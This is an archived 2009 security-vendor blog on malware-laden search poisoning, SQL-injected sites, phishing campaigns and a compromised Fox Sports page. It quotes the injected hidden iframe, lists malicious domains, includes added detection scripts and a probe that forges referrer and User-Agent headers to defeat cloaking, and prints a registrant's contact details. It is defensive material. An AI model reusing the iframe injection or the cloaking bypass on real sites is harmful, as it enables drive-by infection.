Tuesday, December 22, 2009

Live.com Exploited as Pharma-Fraud Cover

The FDA crackdown on online pharmacy sites has drawn a lot of attention to illegal and fraudulent online pharmacies, and in particular to their methods for tricking people into visiting their sites. These practices include prolific spam and search engine poisoning.

eSoft’s Threat Prevention Team has noticed that the search engine poisoning is now very actively making use of Microsoft’s Windows Live Spaces, a free blog hosting environment. The spammers register accounts and use them solely to link to the pharma-fraud sites, which raises the search engine ranking of the target sites. Additionally, the spam emails now link to these fake blogs rather than directly to the pharma-fraud site, in an effort to evade spam filters that might otherwise detect the link to the fraudulent website.

The blog page shown here is typical of those seen by the Threat Prevention Team: it consists of a single blog entry with a single image that links to a classic “Canadian Pharmacy” website, using a template eSoft has seen on thousands of websites. eSoft worked with the ThreatChaos blog to shine a light on these sites and provide full details during a major outbreak in May. More details about this threat may be found in that posting.

Similar attacks have been reported recently using Yahoo and Blogger to draw users to fraudulent pharmacy sites. Google Job Spam has also reportedly infiltrated spaces.live.com.

Whatever the distribution method, it’s clear these cybercriminals will stop at nothing and will continue to evolve new ways of advertising their bogus sites. eSoft has excellent detection for pharma-fraud sites and detects thousands of these URLs month after month. Exploited blogs on spaces.live.com are being flagged as ‘Phishing & Fraud’.

Tuesday, December 15, 2009

Boeing 787 Searches Hijacked by Rogue AV

Today, the Boeing 787 Dreamliner jet completed its much awaited first flight. As users searched to find videos and news articles related to the story, blackhats quickly moved in for yet another attack against Google search results.

The most popular search for several hours today was “787 first flight video”. This search and related searches are saturated with malicious results leading to rogue AV and potentially other malicious payloads.

At peak hours, 5 of the first 9 results led to malicious payloads, pushing users through a series of redirect pages to several different distribution points.

While the distribution points and payloads varied, their effectiveness did not. Most sites were undetected by Google Safe Browsing and the malicious payloads they delivered had very low anti-virus detection rates.

This latest attack is nothing new, but it is shocking how quickly and effectively cybercriminals are able to react to the latest news trends. In this particular attack, the dangerous top results seemed to be compromised sites with existing reputations which makes detection much more difficult.

Saturday, December 12, 2009

eSoft Uncovers 1.5 Million Sites in SQL Injection Attacks

The eSoft Threat Prevention Team has uncovered an additional 1.5 million sites associated with the newest series of SQL injection attacks. The compromised sites are dangerous: they silently infect visitors with Trojan.Buzus in the background. The Buzus family of trojans can steal passwords, financial data, and other sensitive information.

Note: Any sites listed below are dangerous and should not be followed without proper protection.

The compromised pages have the same script tag injected several times, in and around the title and meta tags as well as in other locations. The injected sites share one common marker, a remote “script src=http” include, while the script’s source domain varies from site to site.

The list below shows the injected domains used in this attack. The number next to each domain is the number of sites found, via Google search, to be injected with that domain.

Each domain hosts the same JavaScript, which uses small or hidden iframes to redirect users to other malicious sites where the final payload is delivered. These domains use the same technique described by ScanSafe last week in the 318x injection, in which as many as 300,000 sites were reported compromised. An example is shown below; note that each of the sites in the image is also dangerous, so do not attempt to view the linked sites.

Additionally, the Threat Prevention Team uncovered the related sites below, which use the same type of injection and JavaScript iframe technique. The JavaScript shown below differs slightly from the first attack, using only two iframes, but it infects users and tracks them with the same method.

eSoft is adding detection for these attacks and flagging any victimized sites as compromised. Distribution and redirect sites are marked as malicious, protecting users from downloading the final dangerous payload.

Wednesday, December 9, 2009

Fraudsters Deliver Another Round of Federal Reserve Emails

During the last week, the eSoft Threat Prevention Team has detected a number of malicious emails, allegedly from the Federal Reserve Bank. The emails warn the recipient of phishing attacks and instruct the user to follow a link for more detailed information on the threat.

The email appears to be legitimate, sporting the Federal Reserve emblem and containing a real-looking domain, federalreservebank-oh.com. However, users following the link are exposed to malicious payloads, most recently the Oficla Trojan.

Similar Federal Reserve Bank scams have been around for quite some time and are often used for phishing attacks. Example URLs contained in this newest rash of emails are shown below.


Always be cautious in following links in emails, particularly unexpected messages. If there is any doubt, contact the sender directly to verify the legitimacy of the message. The Threat Prevention Team is flagging these URLs as malicious, protecting SiteFilter customers from this threat. 

Friday, November 20, 2009

Scareware Taints Chromium OS Searches

Yesterday, Google announced the open source project called Chromium OS, a development-phase release of the Google Chrome OS. Blackhats have quickly taken advantage of the announcement, poisoning search results to spread scareware.

Attackers continue to perform Blackhat SEO attacks on Google searches, particularly trending topics. Dangerous results are returned linking the user to Rogue Anti-Virus downloads through a series of scripts and redirects.

The search terms used in this example are "chromium os download", though any combination of terms could return dangerous results. The 5th result in the search below leads to scareware.

Clicking the link takes the user through a series of redirects, ultimately ending up at the distribution point. As with most Rogue AV scams, a fake system scan is performed informing the user their system is virus laden and opening a download to remove the threat.

Even if the user attempts to cancel, the rogue installer starts to download a setup.exe file. The file has low anti-virus detection, as is common with Rogue AV scams, and the user is led to believe the download is safe to install.

After a standard installation, the user is now infected with "SecureKeeper". This is a brand new variant first reported by Sunbelt just yesterday. 

After running another fake system scan, the software reports 736 infections and prompts the user to enter a registration key, or purchase the software. Some very scary messages are displayed, warning the user that criminals will gain access to their credit card and personal information.


Warnings will perpetually appear in the system tray, persuading the user to complete the purchase. For just $49.95 USD you can own this piece of malware...

This is a very typical attack that continues to happen all too often. Attackers will regularly change redirect URLs, malware distribution points and final payloads. This allows them to keep PageRank high and evade detection by anti-virus programs and web filters. The sites are further protected by checking the referring site to ensure the infected page can only be accessed from Google search results.

Raising awareness about this type of scam is one of the most effective ways to keep users safe. Other search engines are targeted less by attackers, which may make them safer for the novice user. eSoft tracks attacks on trending topics and is marking any associated sites as malicious.

Tuesday, November 17, 2009

Blackhats Unleash Another Fake Blog Campaign

In September, eSoft reported as many as 720,000 compromised sites hosting fake blog pages and being used to distribute rogue anti-virus programs. Many of these sites are still active and continue to plague searches with malicious results.

Earlier today, Cyveillance issued this report of a nearly identical attack with over 260,000 dangerous URLs prompting the Threat Prevention Team to revisit this threat.

Between the newly reported Cyveillance URLs and additional URLs discovered by eSoft, there are now well over 800,000 active URLs matching this pattern. Surprisingly, Google detects only a small portion of these sites as malicious.

The key to this scheme is JavaScript uploaded to the compromised server and used in the fake blog pages. The file, css.js, contains obfuscated JavaScript that redirects users to Rogue AV if the site is accessed through certain search engines.

Using this technique allows the attackers to quickly and easily change distribution points and payloads. The current payloads have low detection rates among AV scanners.

In addition to the URL strings reported by Cyveillance be on the lookout for these additional URL types.

eSoft will continue to flag associated domains into their appropriate security categories, protecting SiteFilter users from falling victim to this attack.

Thursday, November 12, 2009

CoolerEmail Hit by Phishing Scam

CoolerEmail is notifying customers of a new phishing scam used to steal login credentials. The web based email marketing program carries an impressive client list including Walmart, Toyota, Pepsi and dozens of other big name brands. Any phished credentials can be used to impersonate these companies in additional phishing or malicious emails.

If you’ve been victimized by this scam, change your password immediately at the CoolerEmail website.

The fraudsters use a classic phishing “hook” and present a very real looking email, complete with company letterhead. The email reports a recent software upgrade and asks users to follow a link in order to confirm their account details.

The disguised link suggests the user will connect directly to the cooleremail.com website. However, the link actually connects to cooleremail1.com – a domain setup by cybercriminals specifically for the phish.

Whois information shows that this domain was registered only recently and is not in any way affiliated with CoolerEmail.

CoolerEmail has sent out a warning notice to customers and stated that they would never ask for confirmation of account details. Always be wary of emails containing any type of link or asking to update account information. If there is any doubt, contact the sender to verify the legitimacy of the email. 

Thursday, November 5, 2009

Japanese Hosting Site Compromised

The eSoft Threat Prevention Team is today warning users to be wary of sites hosted on g0oo.info, a Japanese hosting site. At this time, all blogs and other web sites hosted by g0oo.info are compromised and are being used to boost the Google PageRank of various sites, including Japanese pornography sites, in a technique sometimes called "PageRank Bombing" and also referred to as "BlackHat SEO."

At a glance, these sites look normal, but at the bottom of each page is a box of which only a small portion is visible and which actually holds around 300 links to questionable and pornographic websites. The Threat Prevention Team has found thousands of unique links so far. At any time, the g0oo.info sites could be repurposed for something more dangerous, as could the target pornography websites.

Sample URL associated with the scheme:

eSoft has now flagged thousands of these URLs as "Compromised" and/or "Pornography" as appropriate in order to protect customers and partners who use eSoft's SiteFilter database and block those categories.

Friday, October 23, 2009

Phishing Criminals Take Aim at Yahoo Ad Services

Yahoo! Marketing users are the target of a new phishing scam being detected today by the eSoft Threat Prevention Team. Webmasters receive a very believable notification that their Yahoo Marketing account has expired with a link to login and presumably reactivate the account.

If the user follows the link, they’re presented with an authentic-looking login page where the phishing attack takes place. The username and password entered here are delivered to the attackers for further exploitation. With these credentials, criminals can hijack paid advertisements, replacing legitimate ads with their own malicious links or code.

The “hook” in this scam is a classic warning of impending account closure. The domain being used to serve the phishing attack was registered only today, but has an authentic ring to it. The URLs also use a marketingsolutions.yahoo subdomain to make the URL seem more authentic.

At the time of detection, none of the major search engines or public phishing lists detected this URL as malicious.
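The two tricks in the CoolerEmail and Yahoo! Marketing phishes above (link text naming cooleremail.com while the href goes to cooleremail1.com, and a marketingsolutions.yahoo label grafted onto an attacker-owned domain) can both be caught mechanically. The script below is an added example written for this page, not eSoft code or a SiteFilter feature; the trusted-domain list, the sample messages and the attacker host example-attacker.com are constructed for illustration.

```python
"""Added example, not eSoft's code: two checks for the phishing links described
in the CoolerEmail and Yahoo! Marketing posts above.
  1. The visible text of a link names one domain while the href points at
     another (text says cooleremail.com, href goes to cooleremail1.com).
  2. A trusted brand appears only as a subdomain label or with digits appended,
     while the registrable domain belongs to someone else
     (marketingsolutions.yahoo.<attacker-domain>).
The trusted-domain list, the sample messages and the attacker host
example-attacker.com are constructed for this example."""
import re
from html.parser import HTMLParser
from urllib.parse import urlsplit

TRUSTED_DOMAINS = {"cooleremail.com", "yahoo.com"}   # assumed for the example

# Matches something that looks like a host name inside link text.
DOMAIN_RE = re.compile(r"\b([a-z0-9-]+(?:\.[a-z0-9-]+)+)\b", re.I)


def registrable_domain(host: str) -> str:
    """Crude eTLD+1 (last two labels). Enough for the .com hosts here; a real
    tool should use the Public Suffix List so co.uk-style domains work."""
    labels = host.lower().strip(".").split(".")
    return ".".join(labels[-2:])


def host_of(url: str) -> str:
    if "://" not in url:
        url = "http://" + url
    return (urlsplit(url).hostname or "").lower()


class LinkCollector(HTMLParser):
    """Collects (href, visible text) pairs for every <a> in an HTML body."""

    def __init__(self):
        super().__init__()
        self.links = []
        self._href = None
        self._text = []

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href = dict(attrs).get("href")
            self._text = []

    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)

    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None


def brand_abuse(host: str):
    """Name of the trusted brand this host borrows, or None if the host really
    belongs to that brand (or to no brand at all)."""
    if registrable_domain(host) in TRUSTED_DOMAINS:
        return None
    brands = {d.split(".")[0] for d in TRUSTED_DOMAINS}
    for label in host.lower().split("."):
        stem = re.sub(r"\d+$", "", label)        # cooleremail1 -> cooleremail
        if stem in brands:
            return stem
    return None


def suspicious_links(html: str):
    """Return [(href, reason)] for links that trip either check."""
    parser = LinkCollector()
    parser.feed(html)
    findings = []
    for href, text in parser.links:
        host = host_of(href)
        if not host:
            continue
        shown = DOMAIN_RE.search(text)
        if shown and registrable_domain(shown.group(1)) != registrable_domain(host):
            findings.append((href, "link text shows %s but href goes to %s"
                             % (shown.group(1), host)))
            continue
        brand = brand_abuse(host)
        if brand:
            findings.append((href, "%s appears in %s but the registrable domain is %s"
                             % (brand, host, registrable_domain(host))))
    return findings


# Constructed samples modelled on the two posts.
COOLEREMAIL_SAMPLE = ('<p>Please visit <a href="http://www.cooleremail1.com/login">'
                      'http://www.cooleremail.com/login</a> to confirm your details.</p>')
YAHOO_SAMPLE = ('<p>Your account has expired. <a href="http://marketingsolutions.yahoo.'
                'example-attacker.com/reactivate">Reactivate your account</a></p>')
LEGIT_SAMPLE = '<a href="http://marketingsolutions.yahoo.com/">marketingsolutions.yahoo.com</a>'

if __name__ == "__main__":
    for name, sample in (("cooleremail", COOLEREMAIL_SAMPLE),
                         ("yahoo", YAHOO_SAMPLE), ("legit", LEGIT_SAMPLE)):
        print(name, suspicious_links(sample))
```

The second check deliberately looks at the registrable domain rather than at whether the brand string appears anywhere in the host, which is exactly the mistake the marketingsolutions.yahoo subdomain is designed to exploit. The two-label eTLD+1 shortcut is the weak spot of this toy: swap in a Public Suffix List lookup before using it on anything outside .com.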

Wednesday, October 21, 2009

Compromised Web Servers Host Koobface Malware Cocktail

The Koobface gang has struck again using compromised web servers to deliver a potent mix of malware. eSoft threat researchers have found hundreds of newly exploited sites hosting malware which includes downloaders, keyloggers and multiple variants of the Koobface worm.

Attackers using compromised sites to deliver their malware stand a better chance of evading web filters since those sites are generally already categorized in a "safe" category. The constant changing of the malware binaries also keeps the Anti-Virus detection rates low.

eSoft has noted a constant stream of new malware files coming from these sites.

Koobface is a social network worm that spreads using social engineering. Users typically receive a link to an alleged video. After clicking the link, the user is prompted to update their Flash player or download a codec to view the video. Users who haven't been trained to be skeptical of such requests follow the directions, infecting their machine and allowing the worm to spread through the available social networks using the local user's accounts, targeting that user's friends, family and business contacts. This social networking aspect is part of the lure and the reason the social engineering is so successful: the video might require a download to view, but it came from a close friend, so it is probably fine.

The keyloggers hosted on the compromised sites can be used to steal any kind of sensitive personal information. Koobface will often steal login credentials for social networking sites which it can then use to send more messages and infect more machines.

The compromised sites in this attack are in a format that looks something like this:

eSoft is flagging these sites as 'Compromised'.

Friday, October 16, 2009

Unresolved Compromised Fox Sports Host Heading Into Third Week

eSoft first detected a compromise on the Fox Sports website two weeks ago, and as of today at least one Fox Sports host continues to contain automatically loaded links to a multitude of dangerous exploits. Even with media coverage and direct emails, this compromised host has not been taken offline or cleaned. The threats being hosted have rotated, with the most recent being remote script links to ackworld.com and nt002.cn.

akcworld.com has been hosting a multitude of Gumblar-exploited pages that lead to dangerous trojans.

nt002.cn has been hosting a variety of exploits, most recently targeting the Microsoft Video Control ActiveX vulnerabilities.

We hope that with further attention and pressure, the Fox Sports administrators will address this problem before another week passes.

Wednesday, October 14, 2009

Fresh Twitter Phishing Campaign via Direct Messages and Tweets

A fresh Twitter phishing campaign is underway, using both tweets and direct messages to spread. The messages contain text such as “hah, I think I seen u on here” and “wow you look different on here” together with a link to a video. The URL hxxp://videos.dskjkiuw.com is one of those being used. At this time, eSoft is not detecting malware or exploits on this domain, but the target page presents a good imitation of the Twitter login page in an attempt to steal credentials. As such, eSoft has flagged it as “Phishing & Fraud.” The Threat Prevention Team will keep a close eye on developments. Below is a series of screenshots starting with an example direct message and leading to the fake login page and the series of pages that come up after entering bogus username and password info.

Wednesday, October 7, 2009

Update on Fox Sports Website Infection

Quick update on this threat: as of today, 10/7/09, the Fox Sports website is still compromised. The specific URL, hxxp://msndr.foxsports.com/, has been cleaned, but any added nonsensical path results in a 404 page with the malicious iframe to thingre.com. For example, the hxxp://msndr.foxsports.com/dffdd results in a malicious page leading visitors to malware. eSoft has not received any response from Fox Sports and the classification of the msndr.foxsports.com host remains "Compromised."

Monday, October 5, 2009

Millions At Risk Visiting Popular Sports Site

The Fox Sports website remains infected and a risk to its 6m+ visitors ([popularity data] as reported by Compete). This website, ranked as the 75th most popular website in the United States and 311th most popular in the world according to Alexa [popularity data], remains compromised and a major security risk to end users. eSoft first reported on this threat on Friday, October 2nd, but was incorrect in saying that the infection was cleaned up. [Clarification: the specific pages eSoft examined were cleaned, but other pages have been discovered to still be compromised.] As of today, certain pages on the Fox Sports site remain infected. The eSoft team has written to the webmaster at Fox Sports (along with all contacts listed in their whois records) with some details that we hope will help their team clean up the website. When we hear back from them, we will post it here.

Note that the malware being delivered through this threat remains undetected by the vast majority of anti-virus software. Also note that the compromised pages are being served through the Akamai network although at this time we believe the threat is specific to Fox Sports and not Akamai. Here is part of the email sent to Fox Sports by the eSoft team:

To Whom It May Concern:

eSoft has detected that your website, msndr.foxsports.com, remains infected with a dangerous, hidden iframe that links to a site that uses a variety of exploits to infect your website visitors with one of several rotating trojans. In particular, your 404 Page Not Found page on that server has the iframe right at the end of the HTML document immediately before the </body> tag. See attached screenshot. Unfortunately, eSoft cannot say how your site was compromised, only that it is compromised and the compromised pages are being served through your Akamai distribution network. At this time, eSoft has marked msndr.foxsports.com as a Compromised site and millions of end users are currently blocking access to the site based on that determination. Please let us know when you have corrected the issue so that we may unblock your site.


Friday, October 2, 2009

Foxsports.com Used to Serve Malware

eSoft's Threat Prevention Lab detected malicious code on the foxsports.com website late yesterday. Hackers have once again increased their tally of well known websites recently exploited to serve dangerous content.

The popular sports website was used to transparently redirect users to a dangerous site that regularly hosts malware. The compromised page contained a hidden iframe that retrieved content from the malicious site.

The URL used for the attack was part of the Fantasy Baseball Hot Streak game. Hot Streak Fantasy Baseball users should check their machines for any signs of infection or malicious activity.

The URL hxxp://msn.foxsports.com/fantasy/baseball/hotstreak/external/ contained the hidden iframe below, accessing content at hxxp://thingre.com/in.php.

<iframe src="hxxp://thingre.com/in.php" width="1" height="1" style="visibility:hidden;position:absolute"></iframe>

The redirect domain thingre.com has a poor reputation, not only with eSoft but also with Google, Web of Trust and multiple URL blocklists.

The page can no longer be viewed on the Fox Sports website, and the file on the malicious site has been removed. The last malware known to be hosted at the site was a trojan.dropper variant and the payload delivered last night is assumed to be more of the same. 
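Both the SQL injection campaign above (the same remote "script src=http" include repeated in and around the title and meta tags) and this Fox Sports compromise (a 1x1, visibility:hidden iframe just before </body>, later found on the server's 404 page as well) leave markers that a page scanner can pick out. The script below is an added example written for this page, not eSoft code; it only detects the two markers the posts describe. The Fox Sports iframe markup is the one quoted in the post, while the injected-script host badscript.example and the sample pages are constructed.

```python
"""Added example, not eSoft's code: a scanner for the two injection markers
described in the SQL injection post (remote <script src=http...> tags planted
around the <title> and <meta> tags, often several times) and in the Fox Sports
posts (a 1x1, visibility:hidden <iframe> just before </body>, including on the
server's 404 page). The Fox Sports iframe markup is the one quoted in the post;
the injected-script host badscript.example and the sample pages are constructed."""
import re
from collections import Counter
from html.parser import HTMLParser
from urllib.parse import urlsplit


def _host(url: str) -> str:
    try:
        return (urlsplit(url).hostname or "").lower()
    except ValueError:
        return ""


def _px(value):
    """'1' or '1px' -> 1; anything else (None, '100%') -> None."""
    if value is None:
        return None
    m = re.fullmatch(r"\s*(\d+)(?:px)?\s*", value)
    return int(m.group(1)) if m else None


class InjectionScanner(HTMLParser):
    """Records remote scripts not served from the page's own host (or an
    allow-list of CDN hosts), and iframes that are tiny or hidden by style."""

    def __init__(self, page_host: str, allowed_hosts=()):
        super().__init__()
        self.page_host = page_host.lower()
        self.allowed = {h.lower() for h in allowed_hosts}
        self.in_head = False
        self.findings = []          # (kind, host, "head" | "body")

    def handle_starttag(self, tag, attrs):
        a = {k: (v or "") for k, v in attrs}
        where = "head" if self.in_head else "body"
        if tag == "head":
            self.in_head = True
        elif tag == "script" and a.get("src", "").lower().startswith("http"):
            host = _host(a["src"])
            if host and host != self.page_host and host not in self.allowed:
                self.findings.append(("remote-script", host, where))
        elif tag == "iframe" and self._hidden(a):
            self.findings.append(("hidden-iframe", _host(a.get("src", "")), where))

    def handle_endtag(self, tag):
        if tag == "head":
            self.in_head = False

    @staticmethod
    def _hidden(a):
        style = a.get("style", "").replace(" ", "").lower()
        dims = [_px(a.get(d)) for d in ("width", "height")]
        tiny = all(d is not None and d <= 1 for d in dims)
        return tiny or "visibility:hidden" in style or "display:none" in style


def scan(html: str, page_host: str, allowed_hosts=()):
    s = InjectionScanner(page_host, allowed_hosts)
    s.feed(html)
    s.close()
    return s.findings


def script_hosts(html: str, page_host: str, allowed_hosts=()):
    """How many times each foreign script host is included; the SQL injection
    victims show the same host repeated several times in one page."""
    return dict(Counter(h for kind, h, _ in scan(html, page_host, allowed_hosts)
                        if kind == "remote-script"))


def is_compromised(html: str, page_host: str, allowed_hosts=()):
    return bool(scan(html, page_host, allowed_hosts))


# Constructed sample pages.
INJECTED_PAGE = (
    '<html><head><script src=http://badscript.example/x.js></script>'
    '<title>Widgets<script src=http://badscript.example/x.js></script></title>'
    '<meta name="description" content="widgets">'
    '<script src=http://badscript.example/x.js></script></head>'
    '<body><p>Welcome</p></body></html>')
FOXSPORTS_404 = (
    '<html><head><title>404 Not Found</title></head><body><h1>Not Found</h1>'
    '<iframe src="hxxp://thingre.com/in.php" width="1" height="1" '
    'style="visibility:hidden;position:absolute"></iframe></body></html>')
CLEAN_PAGE = (
    '<html><head><script src="http://www.example.com/js/app.js"></script></head>'
    '<body><iframe src="http://www.example.com/widget" width="300" height="250">'
    '</iframe></body></html>')

if __name__ == "__main__":
    print(scan(INJECTED_PAGE, "www.victim.example"))
    print(scan(FOXSPORTS_404, "msndr.foxsports.com"))
    print(scan(CLEAN_PAGE, "www.example.com"))
```

Two practical notes. Legitimate sites load scripts from CDNs, so the allowed_hosts list has to be populated per site or the remote-script check will be noisy; the repeated-host count from script_hosts is the stronger signal for the SQL injection victims. And, as the Fox Sports update showed, a site's error handler can be infected when its normal pages are clean, so feed the scanner the response to a nonsense path as well as the home page.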

Monday, September 28, 2009

Blackhats Quickly Saturate Google With Tropical Storm Ondoy

Since tropical storm Ondoy hit the Philippine capital on Saturday, attackers have wasted no time planting malicious pages claiming to host videos of the historic disaster. The city of Manila saw flooding on a level that hasn't been seen in decades and the pictures are jaw-dropping. But for surfers looking to see those videos, searching on Google and following the search results can be dangerous.

The actual attack is nearly identical to the attack reported last week where pages are artificially inflated in PageRank, driving them to the top of the search results. In one case, 8 of the 10 top results were found to be malicious. The actual malicious pages are only served up when users come from Google and at this time, anti-virus coverage for the installed malware is very low.

Many of these search results will take the user directly to a Fake AV download while others are more stealthy.

One of the more covert sites is hxxp://www.kolonne.nl/links/1/typhoon-ondoy-update.php. When opened using Google the user is shown the movie window with a play button. The play button is actually a link to hxxp://mycompscanner.com/download.php?id=169.

The user is prompted to install a missing "Active-X Patch" to view the video which leads them to the final payload, Fake AV software. There is no mention of anti-virus software and the user is led to unwittingly install the malicious file.

When Google search was not used to access the page the video image and link to the malicious download did not appear.

[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

This is one of many trending search terms being targeted, including the few examples below.
  • Tim Tebow
  • Jenny Slate
  • Google Birthday
  • Roman Polanski
  • Yom Kippur
PageRank bombs built on Google trending topics are one of the newest ways blackhats are spreading malware. The attackers are very responsive to the latest news and gossip, quickly posting new malicious sites to infect unsuspecting users.

Image Source: http://farm3.static.flickr.com/2555/3956145142_78422979bd.jpg

Monday, September 21, 2009

Google Users Targeted By New Malicious Websites

eSoft’s Threat Prevention Team has been tracking compromised sites that host PageRank Bombs since 2008. The attacker hacks a site, but instead of putting exploits on the hacked site, they put links to other websites in order to boost those sites’ rankings on various search engines. Initially this was being used for ad sites, porn sites, and pharma-fraud sites. Now, however, it is being used to boost the results of malicious sites, with a new twist that targets Google users.

The sites whose search engine ranking is being boosted are now serving up malware through a complex series of redirects. However, the redirects and the malware are only served if the user reaches the site by clicking the link on Google. Going directly to the malicious site (by pasting the URL into your browser) results in a harmless page.

For example, using Google, a search for “nhl all-time scoring leaders” returns several malicious results on the first page (in the 5th, 6th, 7th, 8th and 10th positions). 

Going to the website, hxxp://adoptabeach.org/zzbtw/colzw/leaders.php, directly results in an innocuous page like this:

[Note: during research by eSoft, this page did not return malicious content when directly viewed, but extreme caution should still be taken before visiting any websites listed in this post.]

However, clicking the link in the Google search results will bring the user to a web site using a common Rogue Anti-Virus template that alerts the user that their PC is infected and prompts unsuspecting users to download what is really a Trojan:

The Trojan being downloaded at this point has only a 7% detection rate by anti-virus software with Microsoft, NOD32 and Panda detecting.

Some of the sites being used include:

These redirect through some URLs including:

As far as eSoft’s Threat Prevention Team can tell, the referrer must contain the string google.com/search?q= and the User-Agent must indicate a Windows machine, or the malware will not be delivered. It does not appear that users of other search engines or operating systems are yet being targeted.
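The referrer check described here is the same gate that made the Chromium OS, fake-blog and Ondoy pages above look harmless when visited directly, and it is the reason a researcher's first fetch of a suspect URL proves nothing. The code below is an added example written for this page, not eSoft code and not the attackers' script: it writes out the gate condition exactly as reported in this post (referrer contains google.com/search?q=, User-Agent indicates Windows) and replays the header combinations an analyst needs to see both faces of a page. The User-Agent strings, the simulated cloaked page and its two response bodies are constructed.

```python
"""Added example, not eSoft's code: the referrer/User-Agent gate reported in the
posts above, written out explicitly, plus a probe that replays the header sets
an analyst needs so a page that looks clean on direct access shows its other
face. The gate condition is the one reported in the post; the User-Agent
strings, the simulated cloaked page and its two bodies are constructed."""
import hashlib
import urllib.request
from urllib.parse import quote_plus

# Constructed User-Agent strings.
UA_WINDOWS = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"
UA_MAC = "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_8) Safari/531.9"


def attacker_gate(referer, user_agent):
    """The cloaking decision as described in the post: serve the redirect chain
    only to Windows browsers arriving from a Google search result."""
    return ("google.com/search?q=" in (referer or "")
            and "Windows" in (user_agent or ""))


def replay_headers(query):
    """Header sets to try, in order. 'direct-windows' is what a researcher
    pasting the URL into a browser sends; the others imitate a searcher."""
    ref = "http://www.google.com/search?q=" + quote_plus(query)
    return [
        ("direct-windows", {"User-Agent": UA_WINDOWS}),
        ("google-windows", {"User-Agent": UA_WINDOWS, "Referer": ref}),
        ("google-mac", {"User-Agent": UA_MAC, "Referer": ref}),
    ]


def probe(fetch, query):
    """Run every header set through fetch(headers) -> bytes and report which
    ones received a body different from the direct request."""
    bodies = {name: fetch(headers) for name, headers in replay_headers(query)}
    baseline = hashlib.sha256(bodies["direct-windows"]).hexdigest()
    return sorted(name for name, body in bodies.items()
                  if hashlib.sha256(body).hexdigest() != baseline)


def http_fetcher(url, timeout=20):
    """Real fetcher, for use only from an isolated analysis VM. urlopen follows
    redirects, so capture the chain with a proxy if you need every hop."""
    def fetch(headers):
        req = urllib.request.Request(url, headers=headers)
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return resp.read()
    return fetch


# Simulated cloaked page (constructed) so the probe can run offline.
INNOCUOUS = (b"<html><body><h1>NHL all-time scoring leaders</h1>"
             b"<p>Gretzky, Messier, ...</p></body></html>")
REDIRECT = (b'<html><head><meta http-equiv="refresh" '
            b'content="0;url=http://redirect.example/go"></head></html>')


def cloaked_page(headers):
    """Stand-in for the attacker's server: applies attacker_gate to the request."""
    if attacker_gate(headers.get("Referer"), headers.get("User-Agent")):
        return REDIRECT
    return INNOCUOUS


if __name__ == "__main__":
    # Offline run against the simulated page.
    print(probe(cloaked_page, "nhl all-time scoring leaders"))
    # Against a live URL (isolated VM only):
    # print(probe(http_fetcher("http://<suspect-url>"), "nhl all-time scoring leaders"))
```

The same probe from the command line is two curl invocations, one plain and one with -A "<Windows User-Agent>" -e "http://www.google.com/search?q=..." added; if the bodies differ, the page is cloaking on the referrer. Because the attackers also change distribution points and payloads frequently, record the full redirect chain and the final binary's hash on every run rather than assuming an earlier visit still describes the site.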

Wednesday, September 9, 2009

Fake Blogs Serve Rogue Malware

eSoft’s Threat Prevention Team has uncovered a massive amount of recently exploited websites, all redirecting to Rogue AV malware.

At the time of writing, Google shows over 720,000 compromised URLs. According to VirusTotal [http://www.virustotal.com/analisis/23c06523d4b5cf2c9e853bb5e7a20916e5246e81a17a39b9aad3f2f86056defd-1252440943], only two of forty-one anti-virus engines currently detect the malware.

Credit also goes to Edgar (http://edetools.blogspot.com) who independently discovered and blogged about this same threat.

The compromised sites frequently contain fake blogs on the topics of entertainment and celebrities such as Britney Spears (see screenshot).


Upon visiting the site, an obfuscated JavaScript file redirects the visitor to one of several sites that host the malware payload. Multiple redirect domains are being used to further obscure the final destination, and all of these are currently flagged as malicious by eSoft (most have been set to malicious for over a week).

Unprotected users will see a pop-up window that performs a fake system scan. The user is then notified that they are infected with several threats and prompted to download the supposed cure, which is in fact the malware. This scheme is all too common, and eSoft’s Threat Prevention Team has been detecting a dramatic increase in this scam through August. This latest campaign appears to be the most widespread to date.

The malware payloads change often and anti-virus detection is lagging behind.  eSoft recommends multiple layers of anti-virus at the desktop and gateway in combination with secure web filtering. A secure web filter protects users by blocking the malware distribution points even as the malware changes to evade anti-virus detection.

Friday, August 28, 2009

Chinese Scams Resurface with New Branding

The Threat Prevention Team has found thousands of URLs and over 200 new domains registered to a group of Chinese scammers. The new sites are the same as the old ones, but with new branding and promotional products such as "Acai Power Slim", "Pure Magnum Pro" and "Colo Cleanse Plus". This scam is perpetrated by sending spam messages advertising a "free trial" of the products. In the end, the criminals have made off with personal information, a credit card number and a recurring monthly charge.

Here is an example of an “Acai Power Slim” site. The pages are filled with bogus testimonials, citations from CBS and ABC News and clinical research. Also note the pressure to sign up for the "risk free trial."

As you dig through the site, you'll notice that any meaningful way to contact the site owners has been removed. An email form is present, which presumably will never be answered. All of the domains found match the previous pattern and are registered to Chinese owners.

DomainName : appleaboard.com

Creation Date ..................2009-08-19
Last Update Date ...............2009-08-24

Registrant Name .................FANG JUN
Registrant Organization .........FANG JUN
Registrant Address ..............JIANGYANGBERILI13
Registrant City..................YY
Registrant Province/State .......HN
Registrant Country Code .........CN
Registrant Postal Code ..........414039
Registrant Phone Number .........+86.073051421473
Registrant Fax ..................+86.073051421473
Registrant Email ................hiuaxiang@163.com

Expect to see an increase in spam associated with these domains over the next several weeks as the scammers attempt to lure people to these sites. eSoft is detecting these sites as "Phishing & Fraud."

Here is a sample list of the recently registered domains:
  • appleaboard.com
  • easyalong.com
  • fasterdevelop.com
  • pureacaisolution.com
  • sunnyact.com
More information on this scam is available on the Spam Trackers wiki: http://spamtrackers.eu/wiki/index.php/Acai_Power_Slim

Wednesday, August 26, 2009

New Rash of Fraud Sites Touting Cheap Software

eSoft is researching a widespread and dangerous ring of fraudulent "OEM Software" distribution sites. These sites offer popular software from Microsoft, Adobe, and many other vendors at a greatly reduced price. Not only do they not deliver installable software, they collect sensitive information from individuals, including credit card numbers.

eSoft has identified over 11,000 of these web pages so far.

